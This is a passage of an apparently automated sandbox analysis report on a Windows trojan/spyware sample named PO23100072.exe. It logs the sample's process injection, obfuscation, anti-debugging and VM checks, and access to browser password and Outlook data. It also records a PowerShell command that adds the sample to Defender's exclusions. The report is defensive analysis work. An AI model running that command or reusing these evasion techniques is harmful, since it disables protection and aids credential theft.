            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, cEpaBxiqWvHD9jf5MO.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, psXgUgLSq7fGyTwDTk.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, psXgUgLSq7fGyTwDTk.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, psXgUgLSq7fGyTwDTk.cs, Security API names: _0020.AddAccessRule
            Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@13/7@18/11
            Source: C:\Users\user\Desktop\PO23100072.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO23100072.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3764:120:WilError_03
            Source: C:\Users\user\Desktop\PO23100072.exe, Mutant created: \Sessions\1\BaseNamedObjects\EifhgLHuzhcTLjGSEx
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqk4ot4k.0ij.ps1
            Source: PO23100072.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\PO23100072.exe, File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\PO23100072.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: userinit.exe, 00000009.00000002.3905231115.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3905231115.0000000003186000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1906099501.0000000003186000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1908356674.0000000003192000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1905920458.0000000003165000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO23100072.exe, ReversingLabs: Detection: 52%
            Source: unknown, Process created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Users\user\Desktop\PO23100072.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Users\user\Desktop\PO23100072.exe, Process created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PO23100072.exe, Process created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, Process created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\SysWOW64\userinit.exe"
            Source: C:\Windows\SysWOW64\userinit.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO23100072.exe, Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, windows.storage.dll, profapi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
            Source: C:\Windows\SysWOW64\userinit.exe, Section loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe, Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll
            Source: C:\Users\user\Desktop\PO23100072.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder, Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\PO23100072.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\userinit.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: PO23100072.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO23100072.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: PO23100072.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FrMKpuEiehQ.exe, 00000007.00000002.3904795319.000000000012E000.00000002.00000001.01000000.0000000A.sdmp, FrMKpuEiehQ.exe, 0000000A.00000000.1730386848.000000000012E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO23100072.exe, 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1666001487.0000000003559000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1660307921.00000000033A1000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ZlbU.pdb source: PO23100072.exe
            Source: Binary string: wntdll.pdb source: PO23100072.exe, PO23100072.exe, 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, userinit.exe, 00000009.00000003.1666001487.0000000003559000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000003.1660307921.00000000033A1000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.0000000003700000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000009.00000002.3906544374.000000000389E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: userinit.pdb source: PO23100072.exe, 00000005.00000002.1660702317.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905365390.00000000011E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ZlbU.pdbSHA256X{_ source: PO23100072.exe
            Source: Binary string: userinit.pdbGCTL source: PO23100072.exe, 00000005.00000002.1660702317.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905365390.00000000011E8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: PO23100072.exe, Form1.cs, .Net Code: InitializeComponent
            Source: 0.2.PO23100072.exe.6cc0000.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs, .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO23100072.exe.2b39890.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs, .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO23100072.exe.7720000.3.raw.unpack, psXgUgLSq7fGyTwDTk.cs, .Net Code: AdswuQHbIi System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, psXgUgLSq7fGyTwDTk.cs, .Net Code: AdswuQHbIi System.Reflection.Assembly.Load(byte[])
            Source: 9.2.userinit.exe.3dccd14.2.raw.unpack, Form1.cs, .Net Code: InitializeComponent
            Source: 10.2.FrMKpuEiehQ.exe.306cd14.1.raw.unpack, Form1.cs, .Net Code: InitializeComponent
            Source: 10.0.FrMKpuEiehQ.exe.306cd14.1.raw.unpack, Form1.cs, .Net Code: InitializeComponent
            Source: 14.2.firefox.exe.2055cd14.0.raw.unpack, Form1.cs, .Net Code: InitializeComponent
            Source: PO23100072.exe, Static PE information: 0x9BF3D476 [Thu Nov 28 23:08:38 2052 UTC]
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 0_2_00E7EE10 pushfd ; iretd 0_2_00E7EE11
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_0041A87D push esp; retf 5_2_0041A87E
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_0040710D pushfd ; retf 5_2_0040710E
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_00423916 push esi; retf 5_2_0042392E
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_00423923 push esi; retf 5_2_0042392E
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_004031D0 push eax; ret 5_2_004031D2
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_00418B76 push ebx; retf 5_2_00418B77
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_0041A3C1 push edi; retf 5_2_0041A3C7
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_004143E3 push edi; iretd 5_2_004143EF
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_00417BE6 push es; ret 5_2_00417BE7
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_00411DA3 push edi; iretd 5_2_00411DAF
            Source: C:\Users\user\Desktop\PO23100072.exe, Code function: 5_2_017A09AD push ecx; mov dword ptr [esp], ecx 5_2_017A09B6
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_037309AD push ecx; mov dword ptr [esp], ecx 9_2_037309B6
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_03020743 push esi; retf 9_2_0302075B
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_03020750 push esi; retf 9_2_0302075B
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_0300EBD0 push edi; iretd 9_2_0300EBDC
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_03014A13 push es; ret 9_2_03014A14
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_03020A5C push C67CA722h; ret 9_2_03020A61
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_03020962 push cs; retf 9_2_03020963
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_03011210 push edi; iretd 9_2_0301121C
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_030171EE push edi; retf 9_2_030171F4
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_0302152D push ecx; retf 9_2_03021576
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_030215D5 push edi; ret 9_2_030215D9
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_030159A3 push ebx; retf 9_2_030159A4
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_03003F3A pushfd ; retf 9_2_03003F3B
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_0300DE35 push ecx; retf 9_2_0300DE92
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_0300DE40 push ecx; retf 9_2_0300DE92
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_03A65192 push eax; ret 9_2_03A65194
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_03A54762 push es; ret 9_2_03A54766
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 9_2_03A54FFC pushad ; retf 9_2_03A5502B
            Source: PO23100072.exe, Static PE information: section name: .text entropy: 7.864814644611974
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, C6NmqQYn2FoWfIvl2m.csHigh entropy of concatenated method names: 'Y4P122TBmN', 'SmY1PeiB1t', 'CkY1ZwrTbj', 'Q39ZeYCeIu', 'Pl7ZzPfdQe', 'qxw17HchRX', 'YKB19f4k6S', 'gLb1lwOvbD', 'O3I1QItfCE', 'vaB1wo7NB5'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, cEpaBxiqWvHD9jf5MO.csHigh entropy of concatenated method names: 'tmJ6DWmhAQ', 'v9J6OBPMSn', 'ydH6HUHvlJ', 'a9C6yVgNq2', 'f516AI1D9C', 'tu86Gfo5e6', 'Nbu6MYbFyi', 'pRc6VoaPAB', 'A3t6oIhNZ8', 'Tkr6eyKwZA'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, WfsGnTVNWYHG6SXTyt.csHigh entropy of concatenated method names: 'Ysfr0etR37', 'nNlrqqX5ML', 'F99Pgli0hO', 'CcoPjU2Hp6', 'm16PT4loVX', 'UyqPhmuOFQ', 'OIlPUL2mKM', 'vPMPKdlXCN', 'guvPW1sVpH', 'hAqPFGgYGn'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, FmQnAFzC4FJxGdUYtJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CakNSoEXIY', 'EabNtEH2Sb', 'ttnN8oVIGl', 'VmnN5C1Pji', 'YQJNLIsGxn', 'jXtNNLyRrG', 'S5lNErnZ5h'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, ET77VE7h4DEq42BG9V.csHigh entropy of concatenated method names: 'WiTus52rg', 'bnRYpkudt', 'DRFipn56Q', 'mjpqYWCY9', 'JcFpuNx4O', 'OWtCm4dl6', 'T6gEFkCsW0OGf5eSCC', 'CMh8eDM3QNDUULbFQE', 'AqkQ5foFUY02mVRcYa', 'H1aLCcIjT'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, u6opQHRPu9bZrqjnJ5.csHigh entropy of concatenated method names: 'i6d91NEcoK', 'Ueq9muLsEZ', 'dMV9dDWpAA', 'jRi9cqAE2n', 'Kh99tFKQIv', 'NVn98ny3dH', 'DceUgIlHvlU6tFT4ao', 'Q09NOikKmYQFWEGhZB', 'xbK99UDDnW', 'X0n9Qwj2rU'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, cIMrfI8YECZUoy9Wgk.csHigh entropy of concatenated method names: 'JgoZJ3fL4P', 'eGwZ6a06No', 'axoZrEtCcN', 'tZrZ1dywZp', 'jkNZmPvHgK', 'am4rAlMXO4', 'XgZrGlxSuP', 'rVJrMda7Dw', 'iGBrVU0Mhh', 'ROdro9QmTp'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, XZB4Cn2bUjvIHWj8tZ.csHigh entropy of concatenated method names: 'iGrSxP7X1d', 'bX1SprgHw8', 'vi5SIOVi0w', 'lAbSX51Kjj', 'pb2SjEEYvq', 'PIESTMVtV4', 'mbaSU53rFm', 'cbuSKDlKOf', 'UfQSFdT0KD', 'LZFSbtSyU0'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, DGCpBKjFiN3cjsLhahD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FEtEDiHBGN', 'RW3EOXvpG6', 'rZMEHmh5Wf', 'FqjEyDWOUq', 'NZVEAeakcv', 'Y0tEGNKSum', 'vF2EMCq03v'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, HvjtEwgXNFP1Ejj43r.csHigh entropy of concatenated method names: 'WWZN9oRhMG', 'mANNQ44osc', 'Ve4Nwa5RK2', 'GcRN2hnbpY', 'DmBN6N0HoV', 'do0Nr5aR3q', 'Fe6NZk29i6', 'imdLMpcB0U', 'wjvLVU3M2H', 'WAdLoYFdQZ'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, suu9lcpNXLTZRyxhpD.csHigh entropy of concatenated method names: 'Dispose', 'ktp9otp1lG', 'x9FlXYcOWP', 'AOpvvss1Y0', 'YRF9eTH5y5', 'L5e9zKDNYj', 'ProcessDialogKey', 'olGl7Cca8F', 'inMl9dRwu3', 'ghfllI10hr'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, ErvP1ejqAeKv9bwmA53.csHigh entropy of concatenated method names: 'msUN4EUVJn', 'jIXNBJfnoq', 'PkNNuDHkoj', 'tE7NYWWBen', 'ysLN0qUqrT', 'pRRNi1oEdm', 'pmHNqdbLL8', 'njjNx7SrVP', 'pd4NpieI7m', 'gFiNCOkCNg'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, PjJNapMWqQ1Lcx9igK.csHigh entropy of concatenated method names: 'ShL5dww45t', 'sq95cATYdk', 'ToString', 'XFb52TBXxP', 'DTW56AVkmo', 'qQQ5PwFSwy', 'swk5rZ0tM0', 'ejy5ZeBl33', 'AoG51qRB6H', 'w7r5msZ4LZ'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, UfRHtJwdLtkkprZP2g.csHigh entropy of concatenated method names: 'SwBPYOnWHK', 'BwpPiXXI2i', 'e8fPxgWtZE', 'q6vPp932Ua', 'HRdPtLHLo1', 'XZLP8bKPCF', 'xABP5JE9gL', 'XRSPLvdaF9', 'sU2PNPwrQL', 'FKvPEAHBGa'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, VY0SSpQPiA9ZClro7m.csHigh entropy of concatenated method names: 'DS45VpILY5', 'oZD5eFh3p8', 'w6BL7Fieqd', 'DuaL9wkHnJ', 'sBs5b7Nu9X', 'uDt5nny504', 'Agj5REk7o6', 'zr35DGcVHE', 'caU5OSyS81', 'FYh5Hcts9C'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, FldoPTJeiKlcRyRj5A.csHigh entropy of concatenated method names: 'ToString', 'vKH8bBmrcZ', 'Sec8XHRqAm', 'RWK8gbNkU0', 'CYC8jQouk6', 'a8f8TXSIwE', 'A238hqYHOQ', 'HtN8UtJdqY', 'u0R8K1wGos', 'wgu8WPKL1i'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, gvwuXNde5HTNSILvwD.csHigh entropy of concatenated method names: 'G5n148fkm5', 'XNA1B5SnvA', 'iBn1uUbamI', 'bPj1YjmAdf', 'lSU10Kfs1G', 'Fcu1isJ9v0', 'oLN1q8I2h2', 'DoE1x5IXKb', 'dD01pSH1TS', 'NsP1CIOTuJ'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, psXgUgLSq7fGyTwDTk.csHigh entropy of concatenated method names: 'nkMQJ04NRr', 'cD4Q25MjlT', 'aviQ6SNniG', 'rDEQP4SJ52', 'Cf0QrFcGVL', 'OYeQZqZjHg', 'WsAQ1dQc5i', 'rFfQmjiA1a', 'i1MQa9kma7', 'xqBQdIADV1'
            Source: 0.2.PO23100072.exe.3dc65d0.1.raw.unpack, wP2dKuGdngn9aF68qX.csHigh entropy of concatenated method names: 'fOUL2IbdtD', 'Si6L6uAdUl', 'gybLP88qXH', 'eamLrIl2Vl', 'XhyLZ0ptb4', 'o11L1cZ0FR', 'jEdLmHyV8v', 'jc3LaNDfxt', 'KZTLdIGOCp', 'NLyLc2nFTX'

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\PO23100072.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\userinit.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match, File source: Process Memory Space: PO23100072.exe PID: 1788, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\userinit.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\userinit.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\userinit.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\userinit.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\userinit.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\userinit.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\userinit.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\userinit.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\PO23100072.exe Memory allocated: E00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO23100072.exe Memory allocated: 2B00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO23100072.exe Memory allocated: 2A30000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO23100072.exe Memory allocated: 78F0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO23100072.exe Memory allocated: 88F0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO23100072.exe Memory allocated: 8AA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO23100072.exe Memory allocated: 9AA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_017E096E rdtsc 5_2_017E096E
            Source: C:\Users\user\Desktop\PO23100072.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5269Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1968Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeWindow / User API: threadDelayed 1275Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exeWindow / User API: threadDelayed 8698Jump to behavior
            Source: C:\Users\user\Desktop\PO23100072.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\userinit.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\PO23100072.exe TID: 2752Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6952Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 3364Thread sleep count: 1275 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 3364Thread sleep time: -2550000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 3364Thread sleep count: 8698 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe TID: 3364Thread sleep time: -17396000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe TID: 5372Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe TID: 5372Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe TID: 5372Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe TID: 5372Thread sleep count: 44 > 30Jump to behavior
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe TID: 5372Thread sleep time: -44000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\userinit.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\userinit.exe Code function: 9_2_0301C290 FindFirstFileW,FindNextFileW,FindClose, 9_2_0301C290
            Source: userinit.exe, 00000009.00000002.3910035352.00000000080C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
            Source: PO23100072.exe, 00000000.00000002.1495354166.0000000007720000.00000004.08000000.00040000.00000000.sdmp, PO23100072.exe, 00000000.00000002.1482712855.0000000003D9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: u?QEmU
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003112000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\PO23100072.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\PO23100072.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\userinit.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_004173A3 LdrLoadDll, 5_2_004173A3
            Source: C:\Users\user\Desktop\PO23100072.exe Code function: 5_2_01844180 mov eax, dword ptr fs:[00000030h] 5_2_01844180
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01836500 mov eax, dword ptr fs:[00000030h]5_2_01836500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
